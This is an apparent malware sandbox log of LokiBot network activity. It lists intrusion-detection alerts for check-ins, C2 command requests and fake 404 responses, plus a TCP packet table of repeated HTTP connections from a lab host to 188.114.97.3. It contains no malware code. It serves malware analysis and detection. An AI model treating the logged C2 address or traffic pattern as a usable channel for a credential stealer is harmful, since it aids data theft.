2024-09-25T10:21:03.199950+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49832	188.114.97.3	80	TCP
2024-09-25T10:21:03.199950+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49832	188.114.97.3	80	TCP
2024-09-25T10:21:03.204695+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49832	TCP
2024-09-25T10:21:03.370905+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49833	188.114.97.3	80	TCP
2024-09-25T10:21:03.370905+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49833	188.114.97.3	80	TCP
2024-09-25T10:21:03.370905+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49833	188.114.97.3	80	TCP
2024-09-25T10:21:04.015053+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49833	188.114.97.3	80	TCP
2024-09-25T10:21:04.015053+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49833	188.114.97.3	80	TCP
2024-09-25T10:21:04.019903+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49833	TCP
2024-09-25T10:21:04.493818+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49834	188.114.97.3	80	TCP
2024-09-25T10:21:04.493818+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49834	188.114.97.3	80	TCP
2024-09-25T10:21:04.493818+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49834	188.114.97.3	80	TCP
2024-09-25T10:21:05.131735+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49834	188.114.97.3	80	TCP
2024-09-25T10:21:05.131735+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49834	188.114.97.3	80	TCP
2024-09-25T10:21:05.136585+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49834	TCP
2024-09-25T10:21:05.272946+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49835	188.114.97.3	80	TCP
2024-09-25T10:21:05.272946+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49835	188.114.97.3	80	TCP
2024-09-25T10:21:05.272946+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49835	188.114.97.3	80	TCP
2024-09-25T10:21:05.949911+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49835	188.114.97.3	80	TCP
2024-09-25T10:21:05.949911+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49835	188.114.97.3	80	TCP
2024-09-25T10:21:05.954767+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49835	TCP
2024-09-25T10:21:06.101214+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49836	188.114.97.3	80	TCP
2024-09-25T10:21:06.101214+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49836	188.114.97.3	80	TCP
2024-09-25T10:21:06.101214+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49836	188.114.97.3	80	TCP
2024-09-25T10:21:06.745448+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49836	188.114.97.3	80	TCP
2024-09-25T10:21:06.745448+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49836	188.114.97.3	80	TCP
2024-09-25T10:21:06.752043+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49836	TCP
2024-09-25T10:21:06.901425+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49837	188.114.97.3	80	TCP
2024-09-25T10:21:06.901425+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49837	188.114.97.3	80	TCP
2024-09-25T10:21:06.901425+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49837	188.114.97.3	80	TCP
2024-09-25T10:21:07.563958+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49837	188.114.97.3	80	TCP
2024-09-25T10:21:07.563958+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49837	188.114.97.3	80	TCP
2024-09-25T10:21:07.597503+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49837	TCP
2024-09-25T10:21:07.859251+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49838	188.114.97.3	80	TCP
2024-09-25T10:21:07.859251+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49838	188.114.97.3	80	TCP
2024-09-25T10:21:07.859251+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49838	188.114.97.3	80	TCP
2024-09-25T10:21:08.545523+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49838	188.114.97.3	80	TCP
2024-09-25T10:21:08.545523+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49838	188.114.97.3	80	TCP
2024-09-25T10:21:08.550360+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49838	TCP
2024-09-25T10:21:09.943417+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49839	188.114.97.3	80	TCP
2024-09-25T10:21:09.943417+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49839	188.114.97.3	80	TCP
2024-09-25T10:21:09.943417+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49839	188.114.97.3	80	TCP
2024-09-25T10:21:10.666965+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49839	188.114.97.3	80	TCP
2024-09-25T10:21:10.666965+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49839	188.114.97.3	80	TCP
2024-09-25T10:21:10.675340+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49839	TCP
2024-09-25T10:21:10.818081+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49840	188.114.97.3	80	TCP
2024-09-25T10:21:10.818081+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49840	188.114.97.3	80	TCP
2024-09-25T10:21:10.818081+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49840	188.114.97.3	80	TCP
2024-09-25T10:21:11.513058+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49840	188.114.97.3	80	TCP
2024-09-25T10:21:11.513058+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49840	188.114.97.3	80	TCP
2024-09-25T10:21:11.517815+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49840	TCP
2024-09-25T10:21:11.674440+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49841	188.114.97.3	80	TCP
2024-09-25T10:21:11.674440+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49841	188.114.97.3	80	TCP
2024-09-25T10:21:11.674440+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49841	188.114.97.3	80	TCP
2024-09-25T10:21:12.356325+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49841	188.114.97.3	80	TCP
2024-09-25T10:21:12.356325+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49841	188.114.97.3	80	TCP
2024-09-25T10:21:12.361141+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49841	TCP
2024-09-25T10:21:12.571148+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49842	188.114.97.3	80	TCP
2024-09-25T10:21:12.571148+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49842	188.114.97.3	80	TCP
2024-09-25T10:21:12.571148+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49842	188.114.97.3	80	TCP
2024-09-25T10:21:13.248308+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49842	188.114.97.3	80	TCP
2024-09-25T10:21:13.248308+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49842	188.114.97.3	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 10:19:08.199548960 CEST	49699	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:08.204461098 CEST	80	49699	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:08.204586983 CEST	49699	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:08.206741095 CEST	49699	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:08.211561918 CEST	80	49699	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:08.211637974 CEST	49699	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:08.216398954 CEST	80	49699	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:09.125356913 CEST	80	49699	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:09.125494003 CEST	49699	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:09.125518084 CEST	80	49699	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:09.125547886 CEST	80	49699	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:09.125571966 CEST	49699	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:09.125597954 CEST	49699	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:09.130742073 CEST	80	49699	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:09.249906063 CEST	49700	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:09.255167007 CEST	80	49700	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:09.255420923 CEST	49700	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:09.257600069 CEST	49700	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:09.263339043 CEST	80	49700	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:09.263458014 CEST	49700	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:09.269010067 CEST	80	49700	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:09.982157946 CEST	80	49700	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:09.982172966 CEST	80	49700	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:09.982295036 CEST	49700	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:09.982342958 CEST	49700	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:09.987123013 CEST	80	49700	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:10.050923109 CEST	49701	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:10.055901051 CEST	80	49701	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:10.056020021 CEST	49701	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:10.058101892 CEST	49701	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:10.062851906 CEST	80	49701	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:10.062927008 CEST	49701	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:10.067766905 CEST	80	49701	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:10.811630011 CEST	80	49701	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:10.811769962 CEST	49701	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:10.811793089 CEST	80	49701	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:10.811836004 CEST	49701	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:10.817841053 CEST	80	49701	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:10.956973076 CEST	49702	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:10.962050915 CEST	80	49702	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:10.962202072 CEST	49702	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:10.964413881 CEST	49702	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:10.969232082 CEST	80	49702	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:10.969314098 CEST	49702	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:10.974152088 CEST	80	49702	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:11.665431976 CEST	80	49702	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:11.665714025 CEST	49702	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:11.666590929 CEST	80	49702	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:11.666637897 CEST	49702	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:11.670551062 CEST	80	49702	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:11.821324110 CEST	49703	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:11.830368042 CEST	80	49703	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:11.830593109 CEST	49703	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:11.832576036 CEST	49703	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:11.837702990 CEST	80	49703	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:11.837774038 CEST	49703	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:11.842582941 CEST	80	49703	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:12.530971050 CEST	80	49703	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:12.531179905 CEST	49703	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:12.531327009 CEST	80	49703	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:12.531404018 CEST	49703	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:12.537084103 CEST	80	49703	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:12.676207066 CEST	49704	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:12.681502104 CEST	80	49704	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:12.681730032 CEST	49704	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:12.683944941 CEST	49704	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:12.688783884 CEST	80	49704	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:12.688863993 CEST	49704	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:12.693780899 CEST	80	49704	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:13.452939987 CEST	80	49704	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:13.453181982 CEST	49704	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:13.453852892 CEST	80	49704	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:13.453994989 CEST	49704	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:13.460990906 CEST	80	49704	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:13.600874901 CEST	49705	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:13.606182098 CEST	80	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:13.606321096 CEST	49705	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:13.608577967 CEST	49705	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:13.614825964 CEST	80	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:13.615421057 CEST	49705	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:13.621648073 CEST	80	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:14.450290918 CEST	80	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:14.450306892 CEST	80	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:14.450320959 CEST	80	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:14.450457096 CEST	49705	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:14.451877117 CEST	49705	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:14.459844112 CEST	80	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:14.699407101 CEST	49706	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:14.704406023 CEST	80	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:14.704498053 CEST	49706	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:14.706671953 CEST	49706	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:14.711503983 CEST	80	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:14.711569071 CEST	49706	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:14.716377020 CEST	80	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:15.399228096 CEST	80	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:15.399528027 CEST	49706	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:15.399653912 CEST	80	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:15.399701118 CEST	49706	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:15.404340982 CEST	80	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:15.568581104 CEST	49707	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:15.573679924 CEST	80	49707	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:15.573864937 CEST	49707	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:15.576531887 CEST	49707	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:15.581321001 CEST	80	49707	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:15.581402063 CEST	49707	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:15.586268902 CEST	80	49707	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:16.220118999 CEST	80	49707	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:16.220300913 CEST	49707	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:16.220407009 CEST	80	49707	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:16.220455885 CEST	49707	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:16.225141048 CEST	80	49707	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:16.364773035 CEST	49708	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:16.369715929 CEST	80	49708	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:16.369849920 CEST	49708	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:16.372112989 CEST	49708	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:16.376938105 CEST	80	49708	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:16.376988888 CEST	49708	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:16.381762028 CEST	80	49708	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:17.021929979 CEST	80	49708	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:17.022070885 CEST	49708	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:17.022253036 CEST	80	49708	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:17.022301912 CEST	49708	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:17.026937962 CEST	80	49708	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:17.165874958 CEST	49709	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:17.170787096 CEST	80	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:17.170865059 CEST	49709	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:17.173356056 CEST	49709	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:17.178589106 CEST	80	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:17.178646088 CEST	49709	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:17.183460951 CEST	80	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.146569014 CEST	80	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.146610022 CEST	80	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.146656990 CEST	49709	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:18.146656990 CEST	49709	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:18.146662951 CEST	80	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.146697044 CEST	49709	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:18.146904945 CEST	80	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.146948099 CEST	49709	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:18.151618958 CEST	80	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.284218073 CEST	49710	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:18.289113998 CEST	80	49710	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.289211988 CEST	49710	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:18.291294098 CEST	49710	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:18.296037912 CEST	80	49710	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.296156883 CEST	49710	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:18.300898075 CEST	80	49710	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.987284899 CEST	80	49710	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.987415075 CEST	49710	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:18.987971067 CEST	80	49710	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:18.988023043 CEST	49710	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:18.992491961 CEST	80	49710	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:19.142136097 CEST	49711	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:19.147134066 CEST	80	49711	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:19.147241116 CEST	49711	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:19.149311066 CEST	49711	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:19.154211044 CEST	80	49711	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:19.154273987 CEST	49711	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:19.159226894 CEST	80	49711	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:19.794781923 CEST	80	49711	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:19.794939995 CEST	49711	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:19.795861006 CEST	80	49711	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:19.795917034 CEST	49711	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:19.799881935 CEST	80	49711	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:20.096394062 CEST	49712	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:20.102793932 CEST	80	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:20.102880955 CEST	49712	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:20.131067038 CEST	49712	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:20.137371063 CEST	80	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:20.137434959 CEST	49712	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:20.142748117 CEST	80	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:20.898915052 CEST	80	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:20.899035931 CEST	49712	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:20.899260998 CEST	80	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:20.899394989 CEST	49712	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:20.903836966 CEST	80	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:21.040680885 CEST	49713	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:21.045777082 CEST	80	49713	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:21.045932055 CEST	49713	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:21.048491955 CEST	49713	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:21.053350925 CEST	80	49713	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:21.053477049 CEST	49713	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:21.058329105 CEST	80	49713	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:21.689222097 CEST	80	49713	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:21.689373970 CEST	80	49713	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:21.689404011 CEST	49713	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:21.689440012 CEST	49713	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:21.694245100 CEST	80	49713	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:21.830390930 CEST	49714	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:21.835304022 CEST	80	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:21.835381031 CEST	49714	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:21.837608099 CEST	49714	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:21.842592001 CEST	80	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:21.842648029 CEST	49714	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:21.847511053 CEST	80	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:22.552182913 CEST	80	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:22.552551031 CEST	80	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:22.552650928 CEST	49714	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:22.565459013 CEST	49714	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:22.570359945 CEST	80	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:22.833547115 CEST	49715	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:22.838606119 CEST	80	49715	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:22.839068890 CEST	49715	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:22.850320101 CEST	49715	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:22.855140924 CEST	80	49715	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:22.855191946 CEST	49715	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:22.859966993 CEST	80	49715	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:23.518683910 CEST	80	49715	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:23.518805981 CEST	49715	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:23.518980980 CEST	80	49715	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:23.519057035 CEST	49715	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:23.523582935 CEST	80	49715	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:23.664563894 CEST	49718	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:23.669393063 CEST	80	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:23.669683933 CEST	49718	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:23.672030926 CEST	49718	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:23.676841021 CEST	80	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:23.676953077 CEST	49718	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:23.681781054 CEST	80	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:24.365703106 CEST	80	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:24.365883112 CEST	49718	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:24.366058111 CEST	80	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:24.366107941 CEST	49718	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:24.370930910 CEST	80	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:24.556577921 CEST	49720	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:24.561503887 CEST	80	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:24.561580896 CEST	49720	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:24.565601110 CEST	49720	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:24.570615053 CEST	80	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:24.570672035 CEST	49720	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:24.575530052 CEST	80	49720	188.114.97.3	192.168.2.7
